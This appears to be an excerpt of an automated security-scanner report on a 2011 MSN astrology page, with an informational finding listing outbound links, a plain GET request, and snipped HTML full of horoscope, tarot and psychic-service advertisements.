       <div class="standard11" style="text-align:left;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000">Get everything you want with your 2011 Horoscope! This year, we're giving you more of what you need to get your happily-ever-after ending! All About You is your must-have base report. Add one of the lo
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000">Read More</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2k11&Af=-1000" title=""><b>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdCh2k2&Af=-1000" title=""><b>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMo&Af=-1000" alt="" title="">February Horoscope</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMoRo&Af=-1000" alt="" title="">February LoveScope</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMW&Af=-1000" alt="" title="">Make a Wish Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdYN&Af=-1000" alt="" title="">Yes/No Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdST&Af=-1000" alt="" title="">Soul Mate Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdKS&Af=-1000" alt="" title="">King Solomon</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEH&Af=-1000" alt="" title="">Eye of Horus</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMLT&Af=-1000" alt="" title="">Magic Love Tarot</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDGT&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_STEDGT_60.png" width="60" height="60" alt="" title="" border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDGT&Af=-1000">Gold Tarot</a><br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDGT&Af=-1000">Worried about money? Who isn't? This Tarot reading helps you uncover your personal path to real prosperity!</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDGT&Af=-1000">More</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMT&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdMT_60.png" width="60" height="60" alt="More than your ordinary Tarot..." title="More than your ordinary Tarot..." border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMT&Af=-1000">Personal Star <font style='font-size:10px;'>
...[SNIP]...
<br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMT&Af=-1000">
       This ancient Tarot technique and beautiful, expanded Tarot deck shine the light of your personal star on your question!</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMT&Af=-1000">More</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_STEDST_60.png" width="60" height="60" alt="It takes two to tango..." title="It takes two to tango..." border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">Soul Mate Tarot</a><br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">Be a double agent - get two perspectives of your love relationship to find out how well you mesh with your Soul Mate Tarot!</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">More</a>
...[SNIP]...
<td class="headMod"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000"><font color="#0085aa">
...[SNIP]...
<td><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StTy5_Love_60.png" border="0" width="60" height="60" alt="Talk with a Psychic Advisor" title="Get 5 minutes free!"></a></td>
       <td style="padding-left:10px"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodTitle">Psychic Love Reading</a><br><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodDesc">
       A fabulous complement to any of our love products. Find out what the psychics see for your love future.</a>
...[SNIP]...
<div style="text-align:right;"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodClick">More</a>
...[SNIP]...
<td class="headMod">What is <a target="phoneSite" class="standardL11" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000"><b>
...[SNIP]...
</div>
           1-866-MY-ASTRO is Astrocenter's live advice phone service, which is committed to making quality <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>
           
           Our advisors are highly skilled <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychics</a>
...[SNIP]...
<b>Why <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000" style="color:#FF9944; text-decoration:none">psychic reading</a>
...[SNIP]...
<br>
           Calling a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> advisor for the first time can be overwhelming. Please see below how you may benefit from a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>
           When it comes to love, sometimes we need support to keep going. Whether you are used to turn to astrology or the Tarot for advice, or prefer a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a>
...[SNIP]...
<br>
           Feel fenced in to reach your career potential? our advisors have experience in many fields and their goal is to share their insight. Contact an Astrocenter <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> and see what a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<b><a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000" style="color:#FF9944; text-decoration:none">Tarot reading</a>
...[SNIP]...
<br>
           <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">A Tarot reading</a>
...[SNIP]...
<br>
           Whatever your particular question or personal situation, there's an Astrocenter <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> to guide you. Some <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychics</a>
...[SNIP]...
</a>. Understand how you can use the powerful influences in your life and experience a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>
   It's FREE! Get it <a href="http://www.adobe.com/" target="adobeUpgrade"><u>
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="300" height="250" id="hMod" align="middle">
   <param name="allowScriptAccess" value="always" />
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><a href="http://www.bing.com/search?FORM=A1&amp;q=summer+sandals+2010&amp;src=IE-SearchBox" class="T11TahBk">Search: Summer Sandals</a>
...[SNIP]...
<td width="80" style="padding-left:10px;padding-right:10px;"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEm&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_misc/pict_StEdFreeEmailSub_70.png" width="70" height="70" border="0" title="Free Horoscope and Tarot Newsletters" alt="Free Horoscope and Tarot Newsletters"></a>
...[SNIP]...
<td width="80" style="padding-right:5px;padding-top:8px;" valign="top">
           ..&nbsp;<a target=_blank href="http://www.astrocenter.com/us/PrivacyPopup.aspx" class="prodClick" title="Astrocenter's Privacy Policy">Privacy</a>
...[SNIP]...
<div class="afwrapper standard11"><a href="//privacy-policy.truste.com/click-with-confidence/eusafe/en/www.astrocenter.com/seal_s" title="TRUSTe European Safe Harbor certification" target="_blank"><img align="right" style="border: none; margin-top: -10px" src="//privacy-policy.truste.com/certified-seal/eusafe/en/www.astrocenter.com/seal_s.png" alt="TRUSTe European Safe Harbor certification"/></a>
...[SNIP]...
</a> | <a class="standardL11" href="http://www.horoscope.com"><font color=black>
...[SNIP]...
</a> content Copyright 1999-2011 <a class="standardL11" href="http://www.horoscope.com"><font color=black>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<!-- Vibrant/Bing -->
<script type="text/javascript" src="http://astrocenter.msn.us.intellitxt.com/ast/js/msn/astrocenter.msn_cs.js"></script>
...[SNIP]...

22.41. http://astrocenter.astrology.redacted/msn/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://astrocenter.astrology.redacted
Path:   /msn/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /msn/Default.aspx?When=0&Af=-1000&VS&Af=-1000 HTTP/1.1
Host: astrocenter.astrology.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92523
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:45:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fre
...[SNIP]...
<meta name="robots" CONTENT="index,follow,all">
<link rel="shortcut icon" href="http://www.astrocenter.com/us/center.ico">
<meta http-equiv="PICS-Label" content='(pics-1.0 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "Microsoft Network" on "1996.04.16T08:15-0500" r (n 0 s 0 v 0 l 0))'>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.astrocenter.com/us/js/center-horoscope.js"></script>
...[SNIP]...
</div>
           <img src="http://www.astrocenter.com/us/images/PE.png" align="center"><br>
...[SNIP]...
<li><a href="http://video.msnbc.com/">Video</a>
...[SNIP]...
<li class="c3">
                                   <a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li class="first"><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li>
       <a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li>
       <a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li>
       <a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo">
                               <a href="http://www.bing.com/search?FORM=A18">Bing</a>
...[SNIP]...
<li id="msg" class="last"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search?form=A18">Search the web</a>
...[SNIP]...
</strong>
                       <a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div>
<img src="http://msnportalastrology.112.2O7.net/b/ss/msnportalastrology/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="special" ><a class="special" href=http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000>Charts & Reports</a>
...[SNIP]...
<li ><a href=http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000>PsychicCenter</a>
...[SNIP]...
<a href="javascript:centeredPopup('popup/WhatsIncluded.aspx', 470, 330, 'scrollbars=0,status=0,toolbar=0,location=0');"><img src="http://www.astrocenter.com/us/images/info.gif" align="absmiddle" style="display:inline;width:11px;height:11px" border="0" alt="More Information about Personalized Horoscopes"></a>
...[SNIP]...
<div class="unpDottedLine"><img src="http://www.astrocenter.com/us/images/spacer.gif" width="296" height="1" border="0" title="" alt=""></div>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=0&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_0.png" alt="Aries" title="Aries" border="0">Aries</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=1&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_1.png" alt="Taurus" title="Taurus" border="0">Taurus</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=2&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_2.png" alt="Gemini" title="Gemini" border="0">Gemini</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=3&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_3.png" alt="Cancer" title="Cancer" border="0">Cancer</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=4&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_4.png" alt="Leo" title="Leo" border="0">Leo</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=5&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_5.png" alt="Virgo" title="Virgo" border="0">Virgo</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=6&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_6.png" alt="Libra" title="Libra" border="0">Libra</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=7&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_7.png" alt="Scorpio" title="Scorpio" border="0">Scorpio</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=8&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_8.png" alt="Sagittarius" title="Sagittarius" border="0">Sagittarius</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=9&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_9.png" alt="Capricorn" title="Capricorn" border="0">Capricorn</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=10&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_10.png" alt="Aquarius" title="Aquarius" border="0">Aquarius</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=11&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_11.png" alt="Pisces" title="Pisces" border="0">Pisces</a>
...[SNIP]...
<h2><a class="moduleTitleViolet" style="font-size:11px;" href="http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000">What's New</a>
...[SNIP]...
<div style="padding:5px 10px 5px 10px">This website is <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="adobeUpgrade"><u>even better</u></a> with the latest version of Adobe Flash Player. Plus, it's FREE. Get it <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="adobeUpgrade"><u>
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="302" height="337" id="m5L2" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptLove.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_love.png" class="icn" title="Love Horoscopes" alt="Love Horoscopes"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptNumerology.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_numerology.png" class="icn" title="Numerology" alt="Numerology"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptTarot.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_tarot.png" class="icn" title="Daily Tarot" alt="Daily Tarot"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptChin.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_Chinese.png" class="icn" title="Chinese Horoscopes" alt="Chinese Horoscopes"></a>
...[SNIP]...
<h2><a class="t8wht" href="http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000"><b>
...[SNIP]...
<a href='buyStEdCh2K2.aspx'><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdCh2K2_60.png" alt="2011 Chinese Horoscope" title="2011 Chinese Horoscope" width="60" border="0"></a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">2011 Love Tarot - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdTTL_120.png" width="120" height="120" alt="Stack your deck for love!" title="Stack your deck for love!" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000">This 13-card reading illustrates the romantic atmosphere of each month, as well as the end result! With your 2011 Love Tarot Reading, you'll know how to get what you want, whether it's a hot fling or a
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000">Get your reading &#187;</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/buyStEdMo.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_misc/pict_gen_DidYouKnow_90x110.jpg" width="90" height="110" border="0" title="Did You Know? - Your Inner Child and Astrology" alt="Did You Know? - Your Inner Child and Astrology"></a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdAP&Af=-1000">Get your AstroProfile!</a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">2011 Vedic Forecast - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdVY_120.png" width="120" height="120" alt="Bring your desires to life!" title="Bring your desires to life!" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000">Try a unique take on your future! Use the ancient system of Vedic astrology to gain insight with your 2011 Vedic Horoscope! This report takes a holistic approach to integrate your higher, spiritual asp
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000">Get your report &#187;</a>
...[SNIP]...
<a HREF="http://astrocenter.astrology.redacted/msn/ArticleAstrologyHomeV2.aspx?Af=-1000"><img SRC="http://www.astrocenter.com/us/images/Articles/ast_20100125_145.jpg" WIDTH="145" HEIGHT="232" border="1" alt="5 Myths About Love" title="5 Myths About Love"></img>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">Love Score</a>
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdLS_120.png" width="120" height="120" alt="How do you rate with your mate?" title="How do you rate with your mate?" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">This unique synastry report rates your relationship potential based on seven key factors. It's fun, easy-to-read, and accurate. Love isn't logical, but it makes a lot more sense when you know the score
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">Get your report &#187;</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/HPDream.aspx?Af=-1000#FeaturedDream"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_gen_FeaturedDream_120.png" width="120" height="120" border="0" title="Featured Dream Interpretation" alt="Featured Dream Interpretation"></a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000" class="moduleTitle" style="font-size:12px;">In-depth Insight: 2011 Horoscope - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_145/pict_StEdFr2K2_145.png" width="145" height="232" alt="" title="" border="0"></a></div>
       <div class="standard11" style="text-align:left;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000">Get everything you want with your 2011 Horoscope! This year, we're giving you more of what you need to get your happily-ever-after ending! All About You is your must-have base report. Add one of the lo
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000">Read More</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2k11&Af=-1000" title=""><b>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdCh2k2&Af=-1000" title=""><b>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMo&Af=-1000" alt="" title="">February Horoscope</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMoRo&Af=-1000" alt="" title="">February LoveScope</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMW&Af=-1000" alt="" title="">Make a Wish Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdYN&Af=-1000" alt="" title="">Yes/No Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdST&Af=-1000" alt="" title="">Soul Mate Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdKS&Af=-1000" alt="" title="">King Solomon</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEH&Af=-1000" alt="" title="">Eye of Horus</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMLT&Af=-1000" alt="" title="">Magic Love Tarot</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdLS_60.png" width="60" height="60" alt="How do you rate with your mate?" title="How do you rate with your mate?" border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">Love Score</a><br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">Are you meant for each other? Find out with Love Score - the ultimate fun, easy-to-read, accurate compatibility report!</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">More</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdRU&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdRU_60.png" width="60" height="60" alt="Harness the ancient power of the runes!" title="Harness the ancient power of the runes!" border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdRU&Af=-1000">Runecast</a><br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdRU&Af=-1000">
       Got a question? Ask the Runecast! This easy and fun reading taps into the wisdom of ancient Norse culture.</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdRU&Af=-1000">More</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_STEDST_60.png" width="60" height="60" alt="It takes two to tango..." title="It takes two to tango..." border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">Soul Mate Tarot</a><br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">Be a double agent - get two perspectives of your love relationship to find out how well you mesh with your Soul Mate Tarot!</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">More</a>
...[SNIP]...
<td class="headMod"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000"><font color="#0085aa">
...[SNIP]...
<td><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StTy5_Love_60.png" border="0" width="60" height="60" alt="Talk with a Psychic Advisor" title="Get 5 minutes free!"></a></td>
